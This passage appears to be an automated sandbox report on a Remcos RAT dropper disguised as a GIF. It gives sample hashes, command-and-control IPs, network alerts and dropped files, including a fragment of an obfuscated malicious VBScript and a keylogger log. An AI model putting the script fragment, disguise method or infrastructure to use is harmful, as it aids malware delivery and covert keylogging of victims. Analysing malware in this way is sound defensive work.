                                                        pre_alert_awb_24062024224782020031808174CN1824062400000(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 192.253.251.227
                                                        awb_shipping_post_24062024224782020031808174CN1824062400000(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 192.253.251.227
                                                        ATOM86-ASATOM86NLcreateactiveimagesbeautygirlfrnd.gIF.vbsGet hashmaliciousRemcosBrowse
                                                        • 178.237.33.50
                                                        screensimplethingstohandlecream.gIF.vbsGet hashmaliciousRemcosBrowse
                                                        • 178.237.33.50
                                                        41DLTjkmOm.exeGet hashmaliciousRemcosBrowse
                                                        • 178.237.33.50
                                                        Shipping documents PO 16103 INV.exeGet hashmaliciousRemcosBrowse
                                                        • 178.237.33.50
                                                        17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 178.237.33.50
                                                        172200150645e30715396b41ed298fc2fc05d94f3a962536daa72f2c5d72e7d784323a4055802.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                        • 178.237.33.50
                                                        1722001145c8336cb6887f0bbe0b12744f5c43638979603a57a5fc96eb7f34015fb312b4f7920.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                        • 178.237.33.50
                                                        girlfrnd.docGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 178.237.33.50
                                                        erthings.docGet hashmaliciousRemcosBrowse
                                                        • 178.237.33.50
                                                        girlfrnd.docGet hashmaliciousRemcosBrowse
                                                        • 178.237.33.50

                                                        JA3 Fingerprints

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        3b5074b1b5d032e5620f69f9f700ff0ed34e1p5zD2.exeGet hashmaliciousUnknownBrowse
                                                        • 34.166.62.190
                                                        • 93.113.54.56
                                                        Mu7iyblZk8.exeGet hashmaliciousUnknownBrowse
                                                        • 34.166.62.190
                                                        • 93.113.54.56
                                                        d34e1p5zD2.exeGet hashmaliciousUnknownBrowse
                                                        • 34.166.62.190
                                                        • 93.113.54.56
                                                        QIKiV83Pkl.exeGet hashmaliciousDCRatBrowse
                                                        • 34.166.62.190
                                                        • 93.113.54.56
                                                        Ycj3d5NMhc.exeGet hashmaliciousUnknownBrowse
                                                        • 34.166.62.190
                                                        • 93.113.54.56
                                                        QUOTATION_JULQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 34.166.62.190
                                                        • 93.113.54.56
                                                        FpiUD4nYpj.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                                                        • 34.166.62.190
                                                        • 93.113.54.56
                                                        e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                                                        • 34.166.62.190
                                                        • 93.113.54.56
                                                        file.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                                                        • 34.166.62.190
                                                        • 93.113.54.56
                                                        SecuriteInfo.com.Adware.DownwareNET.4.25474.32231.exeGet hashmaliciousUnknownBrowse
                                                        • 34.166.62.190
                                                        • 93.113.54.56

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\wscript.exe
                                                        File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                        Category:dropped
                                                        Size (bytes):71954
                                                        Entropy (8bit):7.996617769952133
                                                        Encrypted:true
                                                        SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                        MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                        SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                        SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                        SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                        Malicious:false
                                                        Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\wscript.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):328
                                                        Entropy (8bit):3.235702745302682
                                                        Encrypted:false
                                                        SSDEEP:6:kKok99UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:ADImsLNkPlE99SNxAhUe/3
                                                        MD5:460E85B3CDA75F2649CD11238AD6D7C0
                                                        SHA1:50467D4CCA96C9122529F1C49F1A4E3486ABBC9C
                                                        SHA-256:B2CFB02200BD2E0DF42C070217E5EEC2DBDF830026462413E25B23F4FBFE06D7
                                                        SHA-512:B19569E1709A9044B5421DC9180470B81A278A74BD62550AD52FD175E586DC20E5B0E4CA01F39F4612DB2682FB11AD09728CFBED8C93B37CE0C559FAE574DA18
                                                        Malicious:false
                                                        Preview:p...... ...........y....(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\json[1].json

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):962
                                                        Entropy (8bit):5.013811273052389
                                                        Encrypted:false
                                                        SSDEEP:12:tklu+mnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlu+KdRNuKyGX85jvXhNlT3/7AcV9Wro
                                                        MD5:18BC6D34FABB00C1E30D98E8DAEC814A
                                                        SHA1:D21EF72B8421AA7D1F8E8B1DB1323AA93B884C54
                                                        SHA-256:862D5523F77D193121112B15A36F602C4439791D03E24D97EF25F3A6CBE37ED0
                                                        SHA-512:8DF14178B08AD2EDE670572394244B5224C8B070199A4BD851245B88D4EE3D7324FC7864D180DE85221ADFBBCAACB9EE9D2A77B5931D4E878E27334BF8589D71
                                                        Malicious:false
                                                        Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):11608
                                                        Entropy (8bit):4.8908305915084105
                                                        Encrypted:false
                                                        SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9R:9rib4Z1VoGIpN6KQkj2qkjh4iUxsT6YP
                                                        MD5:DD89E182EEC1B964E2EEFE5F8889DCD7
                                                        SHA1:326A3754A1334C32056811411E0C5C96F8BFBBEE
                                                        SHA-256:383ABA2B62EA69A1AA28F0522BCFB0A19F82B15FCC047105B952950FF8B52C63
                                                        SHA-512:B9AFE64D8558860B0CB8BC0FA676008E74F983C4845895E5444DD776A42B584ECE0BB1612D8F97EE631B064F08CF5B2C7622D58A3EF8EF89D199F2ACAEFA8B52
                                                        Malicious:false
                                                        Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):64
                                                        Entropy (8bit):1.1940658735648508
                                                        Encrypted:false
                                                        SSDEEP:3:NlllulVmdtZ:NllUM
                                                        MD5:013016A37665E1E37F0A3576A8EC8324
                                                        SHA1:260F55EC88E3C4D384658F3C18C7FDEF202E47DD
                                                        SHA-256:20C6A3C78E9B98F92B0F0AA8C338FF0BAC1312CBBFE5E65D4C940B828AC92FD8
                                                        SHA-512:99063E180730047A4408E3EF8ABBE1C53DEC1DF04469DFA98666308F60F8E35DEBF7E32066FE0DD1055E1181167061B3512EEE4FE72D0CD3D174E3378BA62ED8
                                                        Malicious:false
                                                        Preview:@...e................................................@..........

                                                        C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                        File Type:ASCII text, with very long lines (2168), with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):26892
                                                        Entropy (8bit):5.629815532396056
                                                        Encrypted:false
                                                        SSDEEP:768:HzSR022X/523S0e8xPPmp2TkLqur5pjMpc4i:TSuce8xPP2qur5+bi
                                                        MD5:7A6E4C385A470B962384797F26BC0B8A
                                                        SHA1:5D4EEEEF8961F0CA7A83B5BAEB36BB6715D61A11
                                                        SHA-256:B13926E222564A63A3308DE6CB116C226E93CD1E9D1B5F2FCAC2DE6D80E70206
                                                        SHA-512:BA326CBBA71BBFD6054A1F3564FCF4C085ADD37C186170E039E9CF469CDD16B0FD394F028D4D09EA45FAADEEA4CF5F4EDB64F8C5DB58EB67ED93987740D8E453
                                                        Malicious:true
                                                        Preview:Function Hazardless....Call Terminologers183.ShellExecute("P" & Essens, forsaales, "", "", Swizzled221)....End Function ....Spetrevlemundstetiser = String(236,"M") ....Rvertogterne = 61512..Supranaturalistic = &H617B..decreers = -54055..dermophobe = "Arkadens wienervalsenes smirkier fitzwater!"..Milieuvrns = &HFFFFB202..Fribilletternes = &HA946..Misrepresentation = 37891..Centralasiens = 4497..Unhasped = &HF896..Dommerstanden = "Trbeskyttelsen udgangene0, gtevir, afvbnede"..Hastemde = 34426..Fuppen = "Ters247 catholical152? turbomotorerne"..Actiniomorpha = "Kontrabogen netvrksadressernes; topvinklen215 stetikkers"..Slumstormer = &HFFFF6B6A..Solennitetssalen150 = 17979..Torskelevers = &H615D..Topstillingen = "Firspring tabulerer"..redigere = "Undiscerningness sprezzatura overdesirous strikkepindes"..Besttes = &H79DF..macroscopical = &H4D24..Hjlpetekstens = &H7376..Controversialism = "Sambars capitulum unfallen gnomists"..Humbug = 19967..Mongrels = -48175..unhelped = "Fortjningen widdies

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4o10xmxe.1yt.psm1

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a0q2jqbg.cem.ps1

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b1gnhz00.2xb.psm1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bwbrpynw.bnu.ps1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ukbjthm3.frw.ps1

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yt3rntba.rz2.psm1

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\bhvCCC4.tmp

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0xf87da552, page size 32768, DirtyShutdown, Windows version 10.0
                                                        Category:dropped
                                                        Size (bytes):17301504
                                                        Entropy (8bit):0.8012509433107802
                                                        Encrypted:false
                                                        SSDEEP:6144:adfjZb5aXEY2waXEY24URlMe4APXAP5APzAPwbndOO8pHAP6JnTJnTbnSotnBQ+z:YVS4e81ySaKKjLrONseWe
                                                        MD5:A33BCA794E94AD82EC7A4D8F0D298375
                                                        SHA1:146F504C7787A6A190742E8ED9D5BC87D1BBD0A5
                                                        SHA-256:AE643DAAA0EE4C8FACD93AB5B41075B0626CD28917D0A00D0F3DF2F402C67B7B
                                                        SHA-512:E5D1498DD07D008A19F372D07D97C02632DA69C25F1AE05988AB651869781FDD401E4FDB4CDDCA2C86403B235A33B186AFD15BA2E18FC614629DB20B05046BE3
                                                        Malicious:false
                                                        Preview:.}.R... .......;!......E{ow("...{........................@.....-....{a.,....|..h.B............................("...{q............................................................................................._...........eJ......n........................................................................................................... ............{...................................................................................................................................................................................................{].....................................,....|......................,....|...........................#......h.B.....................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\yrfptuyewdgikkwbbqnxbflydidjpkpem

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                        File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):2
                                                        Entropy (8bit):1.0
                                                        Encrypted:false
                                                        SSDEEP:3:Qn:Qn
                                                        MD5:F3B25701FE362EC84616A93A45CE9998
                                                        SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                        SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                        SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                        Malicious:false
                                                        Preview:..

                                                        C:\Users\user\AppData\Roaming\Snigmyrdede.Sko

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                        Category:dropped
                                                        Size (bytes):519984
                                                        Entropy (8bit):5.97310447226679
                                                        Encrypted:false
                                                        SSDEEP:6144:ZhZQKJ7e1+X814RJz1/sEa4Gv9hbtE9XcA4009r0KOD7hXDd+NayYrpqy2RtCPKZ:ZhJecX3jh/PGvrsXcAm0PdDdrEPR1Z
                                                        MD5:047E0275BDD0927F6EFEF87097F21863
                                                        SHA1:4299854E50DA9BF541FA2860DD03B635D7DFBA47
                                                        SHA-256:E0E516EA98D02BC1529767D9C3524B6EC48342AF2C5A704CE976D5F2430DF1C2
                                                        SHA-512:B094D60E78B9FD9C230BF53774BA3853321A37BE02174844B7B6B39B977641438310A14267A26977F4C88DB45E52AE5E6F0F98EBB74D8466E960FD1B958574E3
                                                        Malicious:false
                                                        Preview:2cnYwutE+YdSYLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTprwAAANn/h8nrXvqjJk21tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbUfJd7km9vi60InK4Vpzs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs4PZebdwetQhimmGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoPgaMAAAAPcvIpD2Tu60wy73FW9fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX1mw9uwWYP/vDrRP8bZXdHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dH3eHZ4etYLaRSf25ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubtn0D/7v600+Ib8dCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCrvYWg8A2f/Z/utL832YKDc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3

                                                        C:\Users\user\AppData\Roaming\sfvnspt.dat

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):184
                                                        Entropy (8bit):3.31406064972631
                                                        Encrypted:false
                                                        SSDEEP:3:rhlKlViNAnfVlfcl5JWRal2Jl+7R0DAlBG4phlKlViNAnfVlfIblovDl6v:6lViN55YcIeeDAlMlViNPbWAv
                                                        MD5:3F818A080E8613AA2804F9D295C8DDED
                                                        SHA1:C5BBE9697CBA2C276A7F4309F31216DBC97F5DF8
                                                        SHA-256:6B1ADF3590ECDA0E2ED6060ED2F79BAF4900D4884CA441B483E688EB7F37371B
                                                        SHA-512:B44FB3DE71399BEBB076845AB4CA375AEE4DC8EF3F69BBCCC21893AD708E4B42EFD8490527EEF5373C8015229BF4D327E631021EBB79D0232F599C5ED7A2A122
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Roaming\sfvnspt.dat, Author: Joe Security
                                                        Preview:....[.2.0.2.4./.0.7./.2.7. .0.7.:.3.1.:.0.2. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.2.0.2.4./.0.7./.2.7. .0.7.:.3.1.:.0.2. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                                                        Static File Info

                                                        General

                                                        File type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                        Entropy (8bit):3.5864483548852926
                                                        TrID:
                                                        • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                                                        • MP3 audio (1001/1) 32.22%
                                                        • Lumena CEL bitmap (63/63) 2.03%
                                                        • Corel Photo Paint (41/41) 1.32%
                                                        File name:createdthingstobefrankwithmeeverywhere.gIF.vbs
                                                        File size:415'824 bytes
                                                        MD5:4d03b030f4db434da80e0ec3fa7e4398
                                                        SHA1:0b4eed00595be5235f5a51cebeda6fa31402b94b
                                                        SHA256:90afe2e4506b34bd63e597279707d13c6d8512fd52e0b670c9e45890211c76b6
                                                        SHA512:7ec4df4e21931e9091e77d9a23c7d81de11b89c3d0968cd6e8aba8f425cda85b357e4410b3a5a0bb28e80c2ad4999d8c3cc1fba06a2346720f3abad435ce9ebb
                                                        SSDEEP:3072:bHGMwf1YFjhNe4VTdRnTT8w4TW72qjnEgFypBzxjJS7GzYhOJ8XuBYO0zCV2:Xwf1YFB2qjt
                                                        TLSH:64949F5262ED5008B5F33F04AABAA2654A3BFED9DC79C54D458C6A5D0BE3900DC70BB3
                                                        File Content Preview:..d.i.m. .g.a.m.e.l.a.n. .....g.a.m.e.l.a.n. .=. .o.p.s.o.p.h.a.g.i.a.....c.a.b.i.r.t.o.(.".b.i.s.t.o.r.t.a.".). .&. .g.a.m.e.l.a.n. .&. ._.....c.a.b.i.r.t.o.(.".l.a.c.h.a.".). .&. .g.a.m.e.l.a.n. .&. ._.....c.a.b.i.r.t.o.(.".c.a.n.t.o.".). .&. .g.a.m.e.l

                                                        File Icon

                                                        Icon Hash:68d69b8f86ab9a86

                                                        Network Behavior

                                                        Suricata IDS Alerts

                                                        TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                                        2024-07-27T13:31:04.851966+0200TCP2032777ET MALWARE Remcos 3.x Unencrypted Server Response5748449706192.253.251.227192.168.2.5
                                                        2024-07-27T13:31:01.367604+0200TCP2049038ET MALWARE Malicious Base64 Encoded Payload In Image8049704198.46.176.133192.168.2.5
                                                        2024-07-27T13:31:03.293177+0200TCP2032776ET MALWARE Remcos 3.x Unencrypted Checkin4970657484192.168.2.5192.253.251.227
                                                        2024-07-27T13:31:24.727754+0200TCP2012510ET SHELLCODE UTF-8/16 Encoded Shellcode4434971993.113.54.56192.168.2.5
                                                        2024-07-27T13:31:02.365590+0200TCP2020424ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M18049705104.168.45.34192.168.2.5
                                                        2024-07-27T13:31:24.608086+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H49719443192.168.2.593.113.54.56
                                                        2024-07-27T13:33:08.503059+0200TCP2032777ET MALWARE Remcos 3.x Unencrypted Server Response5748449706192.253.251.227192.168.2.5
                                                        2024-07-27T13:31:16.345911+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434971220.114.59.183192.168.2.5
                                                        2024-07-27T13:31:54.656391+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434972120.114.59.183192.168.2.5
                                                        2024-07-27T13:31:17.499992+0200TCP2012510ET SHELLCODE UTF-8/16 Encoded Shellcode4434971193.113.54.56192.168.2.5
